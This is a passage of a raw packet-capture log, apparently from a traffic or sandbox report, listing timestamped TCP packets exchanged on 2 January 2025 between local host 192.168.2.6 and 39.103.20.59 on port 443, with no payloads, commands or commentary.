                                                  Jan 2, 2025 12:14:14.008179903 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.008266926 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.008320093 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.013020039 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.013068914 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.013072014 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.013079882 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.013143063 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.016746998 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.016788960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.016803026 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.016808987 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.016865015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.016865015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.021378040 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.021451950 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.021478891 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.021483898 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.021517038 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.021534920 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.024147987 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.024230003 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.024231911 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.024243116 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.024272919 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.024288893 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.027884007 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.027918100 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.027940989 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.027946949 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.027971983 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.027988911 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.032706976 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.032757044 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.032768965 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.032773972 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.032803059 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.032820940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.036052942 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.036088943 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.036128998 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.036133051 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.036160946 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.036179066 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.097687006 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.097769022 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.100099087 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.100163937 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.102005005 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.102086067 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.105499983 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.105566978 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.107114077 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.107171059 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.108720064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.108777046 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.112397909 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.112456083 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.113894939 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.113951921 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.117227077 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.117288113 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.119075060 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.119165897 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.122417927 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.122482061 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.123972893 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.124043941 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.125600100 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.125665903 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.128933907 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.129003048 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.130636930 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.130700111 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.134151936 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.134232998 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.135865927 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.135922909 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.136249065 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.136298895 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.138097048 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.138160944 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.138818979 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.138880968 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.140609026 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.140671015 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.141824961 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.141881943 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.143192053 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.143244028 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.144078970 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.144143105 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.145375013 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.145431042 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.146522045 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.146580935 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.147411108 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.147476912 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.149180889 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.149235964 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.150017977 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.150093079 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.150949001 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.150998116 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.152518988 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.152571917 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.153799057 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.153847933 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.184302092 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.184370041 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.184387922 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.184444904 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.186837912 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.186928988 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.187165976 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.187237024 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.191961050 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.192022085 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.192049026 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.192097902 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.197133064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.197197914 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.197217941 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.197272062 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.202528000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.202564955 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.202733040 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.202739954 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.205746889 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.207372904 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.207406998 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.207429886 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.207434893 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.207464933 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.207484961 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.210683107 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.210752010 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.210762024 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.210772991 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.210817099 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.215673923 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.215735912 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.215900898 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.215951920 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.220873117 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.220937967 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.221009970 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.221055984 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.223788977 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.223845959 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.223850012 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.223865986 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.223884106 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.223901033 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.226433039 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.226500988 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.226530075 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.226581097 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.228137970 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.228197098 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.228209972 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.228265047 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.230839014 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.230870008 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.230895996 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.230901957 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.230947018 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.233335972 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.233392000 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.233412981 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.233417034 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.233431101 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.233467102 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.235867023 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.235929966 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.238428116 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.238483906 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.238498926 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.238502979 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.238543034 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.271517992 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.271570921 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.271585941 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.271600008 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.271636963 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.271636963 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.273734093 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.273835897 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.273844004 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.273869991 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.273880959 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.273910046 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289475918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289535046 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289597034 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289632082 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289644003 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289648056 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289659023 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289675951 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289684057 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289686918 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289719105 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289737940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.289781094 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.289834023 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.290034056 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.290091038 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.296576023 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.296606064 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.296634912 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.296641111 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.296673059 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.296683073 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.297894955 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.297931910 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.297961950 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.297966003 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.297988892 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.298005104 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.302354097 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.302397013 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.302423954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.302428961 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.302442074 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.302479029 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.307580948 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.307642937 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.307647943 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.307660103 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.307672024 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.307687998 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.307708979 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.310486078 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.310534954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.310614109 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.310667038 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.313286066 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.313374043 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.313374996 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.313389063 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.313420057 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.313430071 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.314819098 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.314855099 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.314889908 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.314898014 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.314909935 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.314937115 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.317625999 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.317668915 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.317703962 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.317708015 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.317729950 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.317751884 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.320019960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.320063114 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.320076942 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.320081949 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.320106983 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.320115089 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.322499037 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.322551012 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.322619915 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.322674990 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.325120926 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.325177908 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.325180054 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.325191975 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.325221062 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.325232029 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.350068092 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.357903957 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.357976913 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.357981920 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.357991934 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.358022928 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.358050108 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.363115072 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.363166094 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.363184929 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.363209963 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.363223076 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.363259077 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.366662979 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.366703033 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.366714954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.366723061 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.366771936 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.373379946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.373462915 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.373513937 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.373570919 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.376060963 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.376113892 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.376120090 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.376133919 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.376177073 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.376184940 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.380661011 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.380721092 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.380772114 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.380825043 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.384676933 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.384728909 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.384747028 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.384766102 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.384779930 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.384816885 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.389108896 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.389156103 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.389161110 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.389170885 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.389215946 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.394292116 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.394345045 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.394481897 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.394540071 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.397326946 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.397382975 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.397422075 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.397475004 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.401834965 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.401895046 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.401993990 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.402045012 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.402822018 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.402903080 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.402951956 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.403007030 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.405646086 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.405711889 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.405781984 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.405862093 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.408154011 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.408204079 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.408209085 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.408221960 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.408236980 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.408252954 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.408272982 CET49984443192.168.2.639.103.20.59
                                                  Jan 2, 2025 12:14:14.410661936 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.410700083 CET4434998439.103.20.59192.168.2.6
                                                  Jan 2, 2025 12:14:14.410718918 CET49984443192.168.2.639.103.20.59
